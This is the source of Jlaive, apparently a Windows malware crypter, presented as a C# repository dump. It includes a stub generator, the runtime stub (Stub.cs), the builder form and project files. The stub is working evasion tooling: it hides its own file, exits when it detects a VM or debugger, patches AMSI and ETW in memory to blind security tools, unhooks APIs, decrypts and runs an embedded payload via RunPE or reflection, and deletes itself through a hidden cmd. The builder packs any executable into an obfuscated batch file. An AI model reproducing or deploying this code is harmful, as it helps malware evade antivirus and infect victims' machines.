Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("payload.exe"), key, iv)); 73 | string runpedlltxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.dll"), key, iv)); 74 | string runpeclass_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.RunPE"), key, iv)); 75 | string runpefunction_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("ExecutePE"), key, iv)); 76 | string unhookertxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("apiunhooker.dll"), key, iv)); 77 | string unhookerclass_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("apiunhooker.APIUnhooker"), key, iv)); 78 | string unhookerfunction_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("Start"), key, iv)); 79 | string cmdcommand_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("/c choice /c y /n /d y /t 1 & attrib -s -h \""), key, iv)); 80 | string key_str = Convert.ToBase64String(key); 81 | string iv_str = Convert.ToBase64String(iv); 82 | 83 | string stub = string.Empty; 84 | string stubcode = GetEmbeddedString("Jlaive.Resources.Stub.cs"); 85 | 86 | if (antidebug) stub += "#define ANTI_DEBUG\n"; 87 | if (antivm) stub += "#define ANTI_VM\n"; 88 | if (native) stub += "#define USE_RUNPE\n"; 89 | if (mode == EncryptionMode.XOR) stub += "#define XOR_ENCRYPT\n"; 90 | else stub += "#define AES_ENCRYPT\n"; 91 | stubcode = stubcode.Replace("namespace_name", namespacename); 92 | stubcode = stubcode.Replace("class_name", classname); 93 | stubcode = stubcode.Replace("aesfunction_name", aesfunction); 94 | stubcode = stubcode.Replace("uncompressfunction_name", uncompressfunction); 95 | stubcode = stubcode.Replace("getembeddedresourcefunction_name", gerfunction); 96 | stubcode = stubcode.Replace("virtualprotect_name", virtualprotect); 97 | stubcode = stubcode.Replace("checkremotedebugger_name", checkremotedebugger); 98 | stubcode = stubcode.Replace("isdebuggerpresent_name", isdebuggerpresent); 99 | stubcode = stubcode.Replace("amsiscanbuffer_str", amsiscanbuffer_str); 100 | stubcode = stubcode.Replace("etweventwrite_str", etweventwrite_str); 101 | stubcode = stubcode.Replace("checkremotedebugger_str", checkremotedebugger_str); 102 | stubcode = stubcode.Replace("isdebuggerpresent_str", isdebuggerpresent_str); 103 | stubcode = stubcode.Replace("payloadtxt_str", payloadtxt_str); 104 | stubcode = stubcode.Replace("runpedlltxt_str", runpedlltxt_str); 105 | stubcode = stubcode.Replace("runpeclass_str", runpeclass_str); 106 | stubcode = stubcode.Replace("runpefunction_str", runpefunction_str); 107 | stubcode = stubcode.Replace("unhookertxt_str", unhookertxt_str); 108 | stubcode = stubcode.Replace("unhookerclass_str", unhookerclass_str); 109 | stubcode = stubcode.Replace("unhookerfunction_str", unhookerfunction_str); 110 | stubcode = stubcode.Replace("cmdcommand_str", cmdcommand_str); 111 | stubcode = stubcode.Replace("key_str", key_str); 112 | stubcode = stubcode.Replace("iv_str", iv_str); 113 | stub += stubcode; 114 | 115 | return stub; 116 | } 117 | } 118 | } -------------------------------------------------------------------------------- /Jlaive/FodyWeavers.xsd: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 13 | 14 | 15 | 16 | 17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 18 | 19 | 20 | 21 | 22 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 23 | 24 | 25 | 26 | 27 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 28 | 29 | 30 | 31 | 32 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 33 | 34 | 35 | 36 | 37 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 38 | 39 | 40 | 41 | 42 | The order of preloaded assemblies, delimited with line breaks. 43 | 44 | 45 | 46 | 47 | 48 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 49 | 50 | 51 | 52 | 53 | Controls if .pdbs for reference assemblies are also embedded. 54 | 55 | 56 | 57 | 58 | Controls if runtime assemblies are also embedded. 59 | 60 | 61 | 62 | 63 | Controls whether the runtime assemblies are embedded with their full path or only with their assembly name. 64 | 65 | 66 | 67 | 68 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 69 | 70 | 71 | 72 | 73 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 74 | 75 | 76 | 77 | 78 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 79 | 80 | 81 | 82 | 83 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 84 | 85 | 86 | 87 | 88 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 89 | 90 | 91 | 92 | 93 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 94 | 95 | 96 | 97 | 98 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 99 | 100 | 101 | 102 | 103 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |. 104 | 105 | 106 | 107 | 108 | A list of unmanaged 32 bit assembly names to include, delimited with |. 109 | 110 | 111 | 112 | 113 | A list of unmanaged 64 bit assembly names to include, delimited with |. 114 | 115 | 116 | 117 | 118 | The order of preloaded assemblies, delimited with |. 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. 127 | 128 | 129 | 130 | 131 | A comma-separated list of error codes that can be safely ignored in assembly verification. 132 | 133 | 134 | 135 | 136 | 'false' to turn off automatic generation of the XML Schema file. 137 | 138 | 139 | 140 | 141 | -------------------------------------------------------------------------------- /Jlaive/Resources/Stub.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.IO.Compression; 5 | using System.Text; 6 | using System.Reflection; 7 | using System.Runtime.InteropServices; 8 | using System.Security.Cryptography; 9 | using System.Security.Principal; 10 | using System.Management; 11 | using System.Threading; 12 | using Microsoft.Win32; 13 | 14 | namespace namespace_name 15 | { 16 | internal class class_name 17 | { 18 | [DllImport("kernel32.dll")] 19 | static extern IntPtr LoadLibrary(string lpFileName); 20 | 21 | [DllImport("kernel32.dll")] 22 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 23 | 24 | delegate bool virtualprotect_name(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 25 | #if ANTI_DEBUG 26 | delegate bool checkremotedebugger_name(IntPtr hProcess, ref bool isDebuggerPresent); 27 | delegate bool isdebuggerpresent_name(); 28 | #endif 29 | 30 | static void Main(string[] args) 31 | { 32 | string currentfilename = Process.GetCurrentProcess().MainModule.FileName; 33 | File.SetAttributes(currentfilename, FileAttributes.Hidden | FileAttributes.System); 34 | #if ANTI_VM 35 | ManagementObjectSearcher searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"); 36 | ManagementObjectCollection instances = searcher.Get(); 37 | foreach (ManagementBaseObject inst in instances) 38 | { 39 | string manufacturer = inst["Manufacturer"].ToString().ToLower(); 40 | if ((manufacturer == "microsoft corporation" && inst["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || manufacturer.Contains("vmware") || inst["Model"].ToString() == "VirtualBox") 41 | { 42 | Environment.Exit(1); 43 | } 44 | } 45 | searcher.Dispose(); 46 | #endif 47 | 48 | IntPtr kmodule = LoadLibrary("k" + "e" + "r" + "n" + "e" + "l" + "3" + "2" + "." + "d" + "l" + "l"); 49 | 50 | #if ANTI_DEBUG 51 | IntPtr crdpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("checkremotedebugger_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 52 | IntPtr idpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("isdebuggerpresent_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 53 | checkremotedebugger_name CheckRemoteDebuggerPresent = (checkremotedebugger_name)Marshal.GetDelegateForFunctionPointer(crdpaddr, typeof(checkremotedebugger_name)); 54 | isdebuggerpresent_name IsDebuggerPresent = (isdebuggerpresent_name)Marshal.GetDelegateForFunctionPointer(idpaddr, typeof(isdebuggerpresent_name)); 55 | bool remotedebug = false; 56 | CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref remotedebug); 57 | if (Debugger.IsAttached || remotedebug || IsDebuggerPresent()) Environment.Exit(1); 58 | #endif 59 | 60 | IntPtr vpaddr = GetProcAddress(kmodule, "V" + "i" + "r" + "t" + "u" + "a" + "l" + "P" + "r" + "o" + "t" + "e" + "c" + "t"); 61 | virtualprotect_name VirtualProtect = (virtualprotect_name)Marshal.GetDelegateForFunctionPointer(vpaddr, typeof(virtualprotect_name)); 62 | byte[] patch; 63 | uint old; 64 | 65 | IntPtr amsimodule = LoadLibrary("a" + "m" + "s" + "i" + "." + "d" + "l" + "l"); 66 | IntPtr asbaddr = GetProcAddress(amsimodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("amsiscanbuffer_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 67 | if (IntPtr.Size == 8) patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; 68 | else patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; 69 | VirtualProtect(asbaddr, (UIntPtr)patch.Length, 0x40, out old); 70 | Marshal.Copy(patch, 0, asbaddr, patch.Length); 71 | VirtualProtect(asbaddr, (UIntPtr)patch.Length, old, out old); 72 | 73 | IntPtr ntdll = LoadLibrary("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"); 74 | IntPtr etwaddr = GetProcAddress(ntdll, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("etweventwrite_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 75 | if (IntPtr.Size == 8) patch = new byte[] { 0xC3 }; 76 | else patch = new byte[] { 0xC2, 0x14, 0x00 }; 77 | VirtualProtect(etwaddr, (UIntPtr)patch.Length, 0x40, out old); 78 | Marshal.Copy(patch, 0, etwaddr, patch.Length); 79 | VirtualProtect(etwaddr, (UIntPtr)patch.Length, old, out old); 80 | 81 | string payloadstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("payloadtxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 82 | string runpestr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpedlltxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 83 | string unhookerstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("unhookertxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 84 | 85 | Assembly unhookerasm = Assembly.Load(uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(unhookerstr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 86 | string unhookerclass = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("unhookerclass_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 87 | string unhookerfunction = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("unhookerfunction_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 88 | unhookerasm.GetType(unhookerclass).GetMethod(unhookerfunction).Invoke(null, null); 89 | 90 | Assembly asm = Assembly.GetExecutingAssembly(); 91 | foreach (string name in asm.GetManifestResourceNames()) 92 | { 93 | if (name == payloadstr || name == runpestr || name == unhookerstr) continue; 94 | File.WriteAllBytes(name, getembeddedresourcefunction_name(name)); 95 | File.SetAttributes(name, FileAttributes.Hidden | FileAttributes.System); 96 | new Thread(() => 97 | { 98 | Process.Start(name).WaitForExit(); 99 | File.SetAttributes(name, FileAttributes.Normal); 100 | File.Delete(name); 101 | }).Start(); 102 | } 103 | 104 | byte[] payload = uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(payloadstr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 105 | string[] targs = new string[] { }; 106 | try 107 | { 108 | targs = args[0].Split(' '); 109 | } 110 | catch { } 111 | 112 | #if USE_RUNPE 113 | Assembly runpe = Assembly.Load(uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(runpestr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")))); 114 | string runpeclass = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpeclass_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 115 | string runpefunction = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpefunction_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 116 | runpe.GetType(runpeclass).GetMethod(runpefunction).Invoke(null, new object[] 117 | { 118 | Path.ChangeExtension(currentfilename, null), 119 | payload, 120 | targs 121 | }); 122 | #else 123 | MethodInfo entry = Assembly.Load(payload).EntryPoint; 124 | try { entry.Invoke(null, new object[] { targs }); } 125 | catch { entry.Invoke(null, null); } 126 | #endif 127 | string cmdstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("cmdcommand_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))); 128 | Process.Start(new ProcessStartInfo() 129 | { 130 | Arguments = cmdstr + currentfilename + "\" & del \"" + currentfilename + "\"", 131 | WindowStyle = ProcessWindowStyle.Hidden, 132 | CreateNoWindow = true, 133 | FileName = "cmd.exe" 134 | }); 135 | } 136 | 137 | static byte[] aesfunction_name(byte[] input, byte[] key, byte[] iv) 138 | { 139 | #if AES_ENCRYPT 140 | AesManaged aes = new AesManaged(); 141 | aes.Mode = CipherMode.CBC; 142 | aes.Padding = PaddingMode.PKCS7; 143 | ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); 144 | byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); 145 | decryptor.Dispose(); 146 | aes.Dispose(); 147 | return decrypted; 148 | #endif 149 | #if XOR_ENCRYPT 150 | for (int i = 0; i < input.Length; i++) 151 | { 152 | input[i] = (byte)(input[i] ^ key[i % key.Length]); 153 | } 154 | return input; 155 | #endif 156 | } 157 | 158 | static byte[] uncompressfunction_name(byte[] bytes) 159 | { 160 | MemoryStream msi = new MemoryStream(bytes); 161 | MemoryStream mso = new MemoryStream(); 162 | GZipStream gs = new GZipStream(msi, CompressionMode.Decompress); 163 | gs.CopyTo(mso); 164 | gs.Dispose(); 165 | mso.Dispose(); 166 | msi.Dispose(); 167 | return mso.ToArray(); 168 | } 169 | 170 | static byte[] getembeddedresourcefunction_name(string name) 171 | { 172 | Assembly asm = Assembly.GetExecutingAssembly(); 173 | MemoryStream ms = new MemoryStream(); 174 | Stream stream = asm.GetManifestResourceStream(name); 175 | stream.CopyTo(ms); 176 | stream.Dispose(); 177 | byte[] ret = ms.ToArray(); 178 | ms.Dispose(); 179 | return ret; 180 | } 181 | } 182 | } -------------------------------------------------------------------------------- /Jlaive/Form1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.CodeDom.Compiler; 3 | using System.Collections.Generic; 4 | using System.Diagnostics; 5 | using System.IO; 6 | using System.Net; 7 | using System.Security.Cryptography; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Windows.Forms; 11 | using Microsoft.CSharp; 12 | 13 | using static Jlaive.Utils; 14 | 15 | namespace Jlaive 16 | { 17 | public partial class Form1 : Form 18 | { 19 | public Form1() 20 | { 21 | InitializeComponent(); 22 | } 23 | 24 | private void Form1_Load(object sender, EventArgs e) 25 | { 26 | SettingsObject obj = Settings.Load(); 27 | if (obj != null) 28 | { 29 | textBox1.Text = obj.inputFile; 30 | antiDebug.Checked = obj.antiDebug; 31 | antiVM.Checked = obj.antiVM; 32 | selfDelete.Checked = obj.selfDelete; 33 | hidden.Checked = obj.hidden; 34 | aesEncryption.Checked = obj.aes; 35 | xorEncryption.Checked = obj.xor; 36 | listBox1.Items.AddRange(obj.bindedFiles); 37 | } 38 | Task.Factory.StartNew(CheckVersion); // Comment out this line to disable version checking 39 | UpdateKeys(sender, e); 40 | } 41 | 42 | private void Form1_FormClosing(object sender, FormClosingEventArgs e) 43 | { 44 | SettingsObject obj = new SettingsObject(); 45 | obj.inputFile = textBox1.Text; 46 | obj.antiDebug = antiDebug.Checked; 47 | obj.antiVM = antiVM.Checked; 48 | obj.selfDelete = selfDelete.Checked; 49 | obj.hidden = hidden.Checked; 50 | obj.aes = aesEncryption.Checked; 51 | obj.xor = xorEncryption.Checked; 52 | List paths = new List(); 53 | foreach (string item in listBox1.Items) paths.Add(item); 54 | obj.bindedFiles = paths.ToArray(); 55 | Settings.Save(obj); 56 | Environment.Exit(0); 57 | } 58 | 59 | private void openButton_Click(object sender, EventArgs e) 60 | { 61 | OpenFileDialog ofd = new OpenFileDialog(); 62 | ofd.RestoreDirectory = true; 63 | if (ofd.ShowDialog() != DialogResult.OK) return; 64 | textBox1.Text = ofd.FileName; 65 | } 66 | 67 | private void buildButton_Click(object sender, EventArgs e) 68 | { 69 | Crypt(); 70 | } 71 | 72 | private void aesEncryption_CheckedChanged(object sender, EventArgs e) 73 | { 74 | if (aesEncryption.Checked) xorEncryption.Checked = false; 75 | } 76 | 77 | private void xorEncryption_CheckedChanged(object sender, EventArgs e) 78 | { 79 | if (xorEncryption.Checked) aesEncryption.Checked = false; 80 | } 81 | 82 | private void addFile_Click(object sender, EventArgs e) 83 | { 84 | OpenFileDialog ofd = new OpenFileDialog(); 85 | ofd.RestoreDirectory = true; 86 | if (ofd.ShowDialog() != DialogResult.OK) return; 87 | listBox1.Items.Add(ofd.FileName); 88 | } 89 | 90 | private void removeFile_Click(object sender, EventArgs e) 91 | { 92 | listBox1.Items.Remove(listBox1.SelectedItem); 93 | } 94 | 95 | private void Crypt() 96 | { 97 | buildButton.Enabled = false; 98 | tabControl1.SelectedTab = tabControl1.TabPages["outputPage"]; 99 | listBox2.Items.Clear(); 100 | 101 | Random rng = new Random(); 102 | string _input = textBox1.Text; 103 | byte[] _key = Convert.FromBase64String(key1.Text); 104 | byte[] _iv = Convert.FromBase64String(iv1.Text); 105 | byte[] _stubkey = Convert.FromBase64String(key2.Text); 106 | byte[] _stubiv = Convert.FromBase64String(iv6.Text); 107 | EncryptionMode mode = xorEncryption.Checked ? EncryptionMode.XOR : EncryptionMode.AES; 108 | if (mode == EncryptionMode.XOR) 109 | { 110 | MessageBox.Show("XOR encryption is currently not available due to bugs.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 111 | buildButton.Enabled = true; 112 | return; 113 | } 114 | 115 | if (!File.Exists(_input)) 116 | { 117 | MessageBox.Show("Invalid input path.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 118 | buildButton.Enabled = true; 119 | return; 120 | } 121 | if (Path.GetExtension(_input) != ".exe") 122 | { 123 | MessageBox.Show("Invalid input file.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 124 | buildButton.Enabled = true; 125 | return; 126 | } 127 | 128 | Console.ForegroundColor = ConsoleColor.Gray; 129 | byte[] pbytes = File.ReadAllBytes(_input); 130 | bool isnetasm = IsAssembly(_input); 131 | 132 | if (isnetasm) 133 | { 134 | listBox2.Items.Add("Patching assembly..."); 135 | pbytes = Patcher.Fix(pbytes); 136 | } 137 | 138 | listBox2.Items.Add("Encrypting payload..."); 139 | byte[] payload_enc = Encrypt(mode, Compress(pbytes), _stubkey, _stubiv); 140 | 141 | listBox2.Items.Add("Creating stub..."); 142 | string stub = StubGen.CreateCS(_stubkey, _stubiv, mode, antiDebug.Checked, antiVM.Checked, !isnetasm, rng); 143 | 144 | listBox2.Items.Add("Building stub..."); 145 | string tempfile = Path.GetTempFileName(); 146 | File.WriteAllBytes("payload.exe", payload_enc); 147 | byte[] unhookerdll_enc = Encrypt(mode, Compress(GetEmbeddedResource("Jlaive.Resources.apiunhooker.dll")), _stubkey, _stubiv); 148 | File.WriteAllBytes("apiunhooker.dll", unhookerdll_enc); 149 | if (!isnetasm) 150 | { 151 | byte[] runpedll_enc = Encrypt(mode, Compress(GetEmbeddedResource("Jlaive.Resources.runpe.dll")), _stubkey, _stubiv); 152 | File.WriteAllBytes("runpe.dll", runpedll_enc); 153 | } 154 | CSharpCodeProvider csc = new CSharpCodeProvider(); 155 | CompilerParameters parameters = new CompilerParameters(new[] { "mscorlib.dll", "System.Core.dll", "System.dll", "System.Management.dll" }, tempfile) 156 | { 157 | GenerateExecutable = true, 158 | CompilerOptions = "/optimize", 159 | IncludeDebugInformation = false 160 | }; 161 | parameters.EmbeddedResources.Add("payload.exe"); 162 | parameters.EmbeddedResources.Add("apiunhooker.dll"); 163 | if (!isnetasm) parameters.EmbeddedResources.Add("runpe.dll"); 164 | foreach (string item in listBox1.Items) parameters.EmbeddedResources.Add(item); 165 | CompilerResults results = csc.CompileAssemblyFromSource(parameters, stub); 166 | if (results.Errors.Count > 0) 167 | { 168 | File.Delete("payload.txt"); 169 | if (!isnetasm) File.Delete("runpe.dll"); 170 | File.Delete(tempfile); 171 | List errors = new List(); 172 | foreach (CompilerError error in results.Errors) errors.Add(error.ToString()); 173 | MessageBox.Show($"Stub build errors:{Environment.NewLine}{string.Join(Environment.NewLine, errors)}", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 174 | buildButton.Enabled = true; 175 | return; 176 | } 177 | byte[] stubbytes = File.ReadAllBytes(tempfile); 178 | File.Delete("payload.exe"); 179 | File.Delete("apiunhooker.dll"); 180 | if (!isnetasm) File.Delete("runpe.dll"); 181 | File.Delete(tempfile); 182 | 183 | listBox2.Items.Add("Encrypting stub..."); 184 | byte[] stub_enc = Encrypt(mode, Compress(stubbytes), _key, _iv); 185 | 186 | listBox2.Items.Add("Creating batch file..."); 187 | string content = FileGen.CreateBat(_key, _iv, mode, hidden.Checked, selfDelete.Checked, rng); 188 | content += Convert.ToBase64String(stub_enc); 189 | 190 | listBox2.Items.Add("Writing output..."); 191 | File.WriteAllText(Path.ChangeExtension(_input, "bat"), content, Encoding.ASCII); 192 | 193 | MessageBox.Show("Done!", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information); 194 | buildButton.Enabled = true; 195 | } 196 | 197 | private void CheckVersion() 198 | { 199 | try 200 | { 201 | WebClient wc = new WebClient(); 202 | string latestversion = wc.DownloadString("https://raw.githubusercontent.com/ch2sh/Jlaive/main/version").Trim(); 203 | wc.Dispose(); 204 | if (File.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion")) 205 | { 206 | string currentversion = File.ReadAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion").Trim(); 207 | if (currentversion != latestversion) 208 | { 209 | DialogResult result = MessageBox.Show($"Jlaive {currentversion} is outdated. Download {latestversion}?", "Warning", MessageBoxButtons.YesNoCancel, MessageBoxIcon.Exclamation); 210 | if (result == DialogResult.Yes) 211 | { 212 | Process.Start("https://github.com/ch2sh/Jlaive/releases/tag/" + latestversion); 213 | } 214 | } 215 | } 216 | File.WriteAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion", latestversion); 217 | } 218 | catch { } 219 | } 220 | 221 | private void UpdateKeys(object sender, EventArgs e) 222 | { 223 | AesManaged aes = new AesManaged(); 224 | key1.Text = Convert.ToBase64String(aes.Key); 225 | iv1.Text = Convert.ToBase64String(aes.IV); 226 | aes.Dispose(); 227 | aes = new AesManaged(); 228 | key2.Text = Convert.ToBase64String(aes.Key); 229 | iv6.Text = Convert.ToBase64String(aes.IV); 230 | aes.Dispose(); 231 | } 232 | } 233 | } -------------------------------------------------------------------------------- /Jlaive/Jlaive.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA} 9 | WinExe 10 | Jlaive 11 | Jlaive 12 | v4.8 13 | 512 14 | true 15 | true 16 | 17 | 18 | 19 | 20 | AnyCPU 21 | true 22 | full 23 | false 24 | bin\Debug\ 25 | DEBUG;TRACE 26 | prompt 27 | 4 28 | 29 | 30 | AnyCPU 31 | none 32 | true 33 | bin\Release\ 34 | TRACE 35 | prompt 36 | 4 37 | 38 | 39 | 40 | ..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll 41 | 42 | 43 | ..\packages\dnlib.3.5.0\lib\net45\dnlib.dll 44 | 45 | 46 | ..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll 47 | True 48 | True 49 | 50 | 51 | ..\packages\Newtonsoft.Json.13.0.1\lib\net45\Newtonsoft.Json.dll 52 | 53 | 54 | 55 | ..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll 56 | True 57 | True 58 | 59 | 60 | 61 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll 62 | True 63 | True 64 | 65 | 66 | 67 | ..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll 68 | 69 | 70 | ..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll 71 | True 72 | True 73 | 74 | 75 | ..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll 76 | True 77 | True 78 | 79 | 80 | ..\packages\System.IO.4.3.0\lib\net462\System.IO.dll 81 | True 82 | True 83 | 84 | 85 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll 86 | True 87 | True 88 | 89 | 90 | 91 | ..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll 92 | True 93 | True 94 | 95 | 96 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll 97 | True 98 | True 99 | 100 | 101 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll 102 | True 103 | True 104 | 105 | 106 | ..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll 107 | True 108 | True 109 | 110 | 111 | ..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll 112 | True 113 | True 114 | 115 | 116 | ..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll 117 | True 118 | True 119 | 120 | 121 | ..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll 122 | True 123 | True 124 | 125 | 126 | 127 | ..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll 128 | True 129 | True 130 | 131 | 132 | ..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll 133 | True 134 | True 135 | 136 | 137 | ..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll 138 | True 139 | True 140 | 141 | 142 | ..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll 143 | True 144 | True 145 | 146 | 147 | ..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll 148 | True 149 | True 150 | 151 | 152 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll 153 | True 154 | True 155 | 156 | 157 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll 158 | True 159 | True 160 | 161 | 162 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll 163 | True 164 | True 165 | 166 | 167 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll 168 | True 169 | True 170 | 171 | 172 | ..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll 173 | True 174 | True 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll 186 | True 187 | True 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | Form 197 | 198 | 199 | Form1.cs 200 | 201 | 202 | 203 | 204 | 205 | 206 | Form1.cs 207 | 208 | 209 | 210 | ResXFileCodeGenerator 211 | Resources.Designer.cs 212 | Designer 213 | 214 | 215 | True 216 | Resources.resx 217 | 218 | 219 | 220 | SettingsSingleFileGenerator 221 | Settings.Designer.cs 222 | 223 | 224 | True 225 | Settings.settings 226 | True 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 245 | 246 | 247 | 248 | 249 | 250 | 251 | -------------------------------------------------------------------------------- /Jlaive/Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace Jlaive 2 | { 3 | partial class Form1 4 | { 5 | ///

6 | /// Required designer variable. 7 | ///

8 | private System.ComponentModel.IContainer components = null; 9 | 10 | ///

11 | /// Clean up any resources being used. 12 | ///

